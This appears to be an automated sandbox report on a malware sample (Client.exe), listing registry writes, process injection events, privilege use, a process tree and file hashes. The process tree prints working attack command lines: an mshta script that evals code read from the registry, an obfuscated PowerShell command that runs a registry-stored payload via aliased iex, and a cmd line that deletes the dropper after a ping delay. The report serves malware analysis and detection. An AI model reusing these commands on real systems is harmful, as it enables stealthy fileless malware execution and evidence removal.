\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\296c7fe0-7c30-4399-9 = "8324" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1d8c7192-1824-439e-b = da5c1c775afcd901 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fa2e16cc-f0b5-4d98-8 = d02ddf7c5afcd901 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fa2e16cc-f0b5-4d98-8 = "8324" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1c70a371-e627-462c-9 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fb4060f5-deed-4734-9 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\32f3168e-9794-4c8a-a = "0" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1ce6b35f-a329-4d61-8 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a5ebedc8-c9df-4308-8 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7082dc2a-515b-4817-9 = "0" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a5ebedc8-c9df-4308-8 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a5ebedc8-c9df-4308-8 = "0" RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\ec73ecb3-6d21-4fb3-b RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7082dc2a-515b-4817-9 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\05a8205a-3321-4131-b = 433dd6605afcd901 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\32f3168e-9794-4c8a-a RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fdcdeac2-3361-446d-9 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1d8c7192-1824-439e-b = "0" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\821100a3-c46d-48ec-b = "8324" RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fdcdeac2-3361-446d-9 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7421f031-8923-45ea-9 = 069370675afcd901 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a07da212-3d59-42d0-a = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000d844746d5afcd9016a3d01735afcd9016a3d01735afcd901de6204000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000004b57137e2000663830636134393431336239313538616439636565343837333463333036626532653537666632373166373738323431646233643736633036646436373633390000b20009000400efbe4b57137e4b57137e2e00000000000000000000000000000000000000000000000000f2479000660038003000630061003400390034003100330062003900310035003800610064003900630065006500340038003700330034006300330030003600620065003200650035003700660066003200370031006600370037003800320034003100640062003300640037003600630030003600640064003600370036003300390000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000c5b088b81000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c66383063613439343133623931353861643963656534383733346333303662653265353766663237316637373832343164623364373663303664643637363339000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000736d696a776a6d68000000000000000052d8063eedfcdf448a23f9f8aed1bb8a7242cec39b53ee11941eda422a6bcb3952d8063eedfcdf448a23f9f8aed1bb8a7242cec39b53ee11941eda422a6bcb39ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002d00000053002d0031002d0035002d00320031002d003900310039003200350034003400390032002d0033003900370039003200390033003900390037002d003700360034003400300037003100390032002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000530b1468000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1d8c7192-1824-439e-b RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7421f031-8923-45ea-9 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7421f031-8923-45ea-9 = "8324" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7421f031-8923-45ea-9 = "\\\\?\\Volume{68140B53-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\e38bd5c54d5628704845c3dc84803632f7af2cd8157c1d4743bb448552631679" RuntimeBroker.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
PING.EXEpid process 2492 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
Client.exepowershell.exeExplorer.EXEpid process 5020 Client.exe 5020 Client.exe 1660 powershell.exe 1660 powershell.exe 1660 powershell.exe 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 3136 Explorer.EXE -
Suspicious behavior: MapViewOfSection 8 IoCs
Processes:
powershell.exeExplorer.EXEcmd.exepid process 1660 powershell.exe 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 1232 cmd.exe 3136 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 17 IoCs
Processes:
powershell.exeExplorer.EXERuntimeBroker.exedescription pid process Token: SeDebugPrivilege 1660 powershell.exe Token: SeShutdownPrivilege 3136 Explorer.EXE Token: SeCreatePagefilePrivilege 3136 Explorer.EXE Token: SeShutdownPrivilege 3136 Explorer.EXE Token: SeCreatePagefilePrivilege 3136 Explorer.EXE Token: SeShutdownPrivilege 3136 Explorer.EXE Token: SeCreatePagefilePrivilege 3136 Explorer.EXE Token: SeShutdownPrivilege 3716 RuntimeBroker.exe Token: SeShutdownPrivilege 3716 RuntimeBroker.exe Token: SeShutdownPrivilege 3136 Explorer.EXE Token: SeCreatePagefilePrivilege 3136 Explorer.EXE Token: SeShutdownPrivilege 3136 Explorer.EXE Token: SeCreatePagefilePrivilege 3136 Explorer.EXE Token: SeShutdownPrivilege 3136 Explorer.EXE Token: SeCreatePagefilePrivilege 3136 Explorer.EXE Token: SeShutdownPrivilege 3136 Explorer.EXE Token: SeCreatePagefilePrivilege 3136 Explorer.EXE -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Explorer.EXEpid process 3136 Explorer.EXE -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
Explorer.EXEpid process 3136 Explorer.EXE -
Suspicious use of WriteProcessMemory 46 IoCs
Processes:
mshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.exedescription pid process target process PID 1140 wrote to memory of 1660 1140 mshta.exe powershell.exe PID 1140 wrote to memory of 1660 1140 mshta.exe powershell.exe PID 1660 wrote to memory of 2840 1660 powershell.exe csc.exe PID 1660 wrote to memory of 2840 1660 powershell.exe csc.exe PID 2840 wrote to memory of 4744 2840 csc.exe cvtres.exe PID 2840 wrote to memory of 4744 2840 csc.exe cvtres.exe PID 1660 wrote to memory of 1508 1660 powershell.exe csc.exe PID 1660 wrote to memory of 1508 1660 powershell.exe csc.exe PID 1508 wrote to memory of 2972 1508 csc.exe cvtres.exe PID 1508 wrote to memory of 2972 1508 csc.exe cvtres.exe PID 1660 wrote to memory of 3136 1660 powershell.exe Explorer.EXE PID 1660 wrote to memory of 3136 1660 powershell.exe Explorer.EXE PID 1660 wrote to memory of 3136 1660 powershell.exe Explorer.EXE PID 1660 wrote to memory of 3136 1660 powershell.exe Explorer.EXE PID 3136 wrote to memory of 1232 3136 Explorer.EXE cmd.exe PID 3136 wrote to memory of 1232 3136 Explorer.EXE cmd.exe PID 3136 wrote to memory of 1232 3136 Explorer.EXE cmd.exe PID 3136 wrote to memory of 3716 3136 Explorer.EXE RuntimeBroker.exe PID 3136 wrote to memory of 3716 3136 Explorer.EXE RuntimeBroker.exe PID 3136 wrote to memory of 1232 3136 Explorer.EXE cmd.exe PID 3136 wrote to memory of 3716 3136 Explorer.EXE RuntimeBroker.exe PID 3136 wrote to memory of 1232 3136 Explorer.EXE cmd.exe PID 3136 wrote to memory of 3716 3136 Explorer.EXE RuntimeBroker.exe PID 3136 wrote to memory of 3988 3136 Explorer.EXE RuntimeBroker.exe PID 3136 wrote to memory of 3988 3136 Explorer.EXE RuntimeBroker.exe PID 3136 wrote to memory of 3988 3136 Explorer.EXE RuntimeBroker.exe PID 3136 wrote to memory of 3988 3136 Explorer.EXE RuntimeBroker.exe PID 3136 wrote to memory of 4840 3136 Explorer.EXE RuntimeBroker.exe PID 3136 wrote to memory of 4840 3136 Explorer.EXE RuntimeBroker.exe PID 3136 wrote to memory of 4840 3136 Explorer.EXE RuntimeBroker.exe PID 3136 wrote to memory of 4840 3136 Explorer.EXE RuntimeBroker.exe PID 3136 wrote to memory of 1328 3136 Explorer.EXE RuntimeBroker.exe PID 3136 wrote to memory of 1328 3136 Explorer.EXE RuntimeBroker.exe PID 3136 wrote to memory of 1328 3136 Explorer.EXE RuntimeBroker.exe PID 3136 wrote to memory of 1328 3136 Explorer.EXE RuntimeBroker.exe PID 3136 wrote to memory of 4364 3136 Explorer.EXE cmd.exe PID 3136 wrote to memory of 4364 3136 Explorer.EXE cmd.exe PID 3136 wrote to memory of 4364 3136 Explorer.EXE cmd.exe PID 3136 wrote to memory of 4364 3136 Explorer.EXE cmd.exe PID 1232 wrote to memory of 2492 1232 cmd.exe PING.EXE PID 1232 wrote to memory of 2492 1232 cmd.exe PING.EXE PID 1232 wrote to memory of 2492 1232 cmd.exe PING.EXE PID 1232 wrote to memory of 2492 1232 cmd.exe PING.EXE PID 1232 wrote to memory of 2492 1232 cmd.exe PING.EXE PID 3136 wrote to memory of 4364 3136 Explorer.EXE cmd.exe PID 3136 wrote to memory of 4364 3136 Explorer.EXE cmd.exe
Processes
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3716
-
C:\Users\Admin\AppData\Local\Temp\Client.exe"C:\Users\Admin\AppData\Local\Temp\Client.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
PID:5020
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4840
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3988
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:3136 -
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script>L7xs='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(L7xs).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\2B8EB0FA-8E4D-9577-F08F-A2992433F6DD\\\LinkActive'));if(!window.flag)close()</script>"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1140 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name tmnirt -value gp; new-alias -name kyyemclnvj -value iex; kyyemclnvj ([System.Text.Encoding]::ASCII.GetString((tmnirt "HKCU:Software\AppDataLow\Software\Microsoft\2B8EB0FA-8E4D-9577-F08F-A2992433F6DD").PlayPlay))3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1660 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\i0try2yw\i0try2yw.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:2840 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1C6C.tmp" "c:\Users\Admin\AppData\Local\Temp\i0try2yw\CSCD716EEE75894499E8695FB1C1C717AE.TMP"5⤵PID:4744
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cbmktrc4\cbmktrc4.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:1508 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2B41.tmp" "c:\Users\Admin\AppData\Local\Temp\cbmktrc4\CSCE8D37534EFF2455698FCDB1CE367A570.TMP"5⤵PID:2972
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\Client.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1232 -
C:\Windows\system32\PING.EXEping localhost -n 53⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2492
-
-
-
C:\Windows\syswow64\cmd.exe"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,2⤵PID:4364
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
PID:1328
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD50d293a2fc81f05b02cb8d434d178d8df
SHA129e40b15a28b5c962b760c12e063e41b5a9cf99c
SHA256eda2962ee4c7cfcc24495b9a6260980a7bc8c90864793dd6fae3538bcb64f6e5
SHA512dd9ed9eb8d055eca6011e525c52cbc26a01314164a1c9856a0ed56456a7a061b56a76497066a2fd4305a334e9fb7adeacd90238ba9c4aa9b1c515b99767f1302
-
Filesize
1KB
MD52774abd984eb408d84540b4e94094938
SHA1ae3fec3ddbfd1c999af47e7a0c25e3432a804ac2
SHA256280f7a9965b12376ffde27997e0756f59c8ba264d10a44ca9e35cb9c83e9a2d2
SHA512ecafde6397326d2c22348ec7915dc2cc7f053f2e0476ad85a5698270acf611ebad1187b9493231adcce0fe0a48f70e0dabcf022d22215b8868a867749d90beb6
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD599e2d90c933f17c6367ea15fe9c5f7d8
SHA158579cbac9e5f0eb7ccc88473993b886e2ed9b6e
SHA256b5fa193a441f2a91ec29508640f7034299ff3cb226c9e5f8262c5f6cd20dc46e
SHA5122bcee4b827b14cc3140cdf8f349bb634ee60226daf6e60196c2902ad085aaaa76c45a2c276044be321a840fb03962052e2bc065ff46ae5ef326e22bfd741286e
-
Filesize
3KB
MD5d05f3e78a6ee314c983d4c593514cb9c
SHA159c5b670cbd8f4746c5724704fa39a4c5c215cc2
SHA2568bda3eb959e7d37ddb1f8a2c64849dfce053b6fe6dc898a98f85e974cc59605f
SHA512aa5145d45c953f909441abfeac6d69b5779c59a28dcf04e8833c262b9d10242218bfe5da049039cb6d64b8a1c3eed076a962dd4f3b56bf814f94f77cf19c2fe6
-
Filesize
652B
MD57020a3fecb06f61287530e621e0d94e2
SHA1cdf05a22b7e2b601f52a2432ae6a4d476e9f38b3
SHA256191abf760ebdb798df00d8d9a3d0c74bfa230b234b4fc9f853a3f78969ebb90d
SHA5124a41c280aa32d9b11dbbd7d87c5ae4ddcf62bea395cd00c05fbcb02fff23b274182b364c4504cfe3aafc164fa2038de20bed9bee2b0063df74cc6ab55df97188
-
Filesize
406B
MD5ca8887eacd573690830f71efaf282712
SHA10acd4f49fc8cf6372950792402ec3aeb68569ef8
SHA256568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3
SHA5122a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7
-
Filesize
369B
MD5c7de24998a5071515b47d595e83b7b93
SHA17f8c1cda934063d7d05743e995988dca674c48c9
SHA25654b3a1291abb515bc66d2799c4461cb008f179b00e1f3bc6632632cdf0eec548
SHA512010e20939fb52659fd83d0c4fde55865096dd3bc028c9473c1417171e35971ad9affc580db11284f706180b315b2207b55e20466f88b06176b984ee6f8940012
-
Filesize
652B
MD5f4a6db0a17df4fc03e3b07d10a063b9c
SHA18d50c55fac891cbdaa6372d9a644f35e2f0cd5fe
SHA25635d84059c4cb128a6044d45ec243e92b0ca004e46737752e0527c6919df4ea8c
SHA51292f5bf85eb7a777c3d6179db0a0d41e3805cead08850d3e0e08d498194162becaeac5cdd7fdfc7f6dd8c4c6d810c452ffb273ee9a1bf1fe1357752992020a874
-
Filesize
405B
MD5caed0b2e2cebaecd1db50994e0c15272
SHA15dfac9382598e0ad2e700de4f833de155c9c65fa
SHA25621210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150
SHA51286dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62
-
Filesize
369B
MD5a8a687b75d27e2c0eb169018652410ea
SHA1eebda54d8fabc054abe3f730b51adf375e7c8d5d
SHA256110123f4e642768f40d619217b9250bf26972b2de787687f6c21e7b93b655a97
SHA512d9bed7839423673991bb10f19fd590a76c790600b1b685eff5907ea1ea00fbc35bcc423b3e5af66d36693d88999f185ff91ea7f2f22faaa6d11a4b799daeb1b4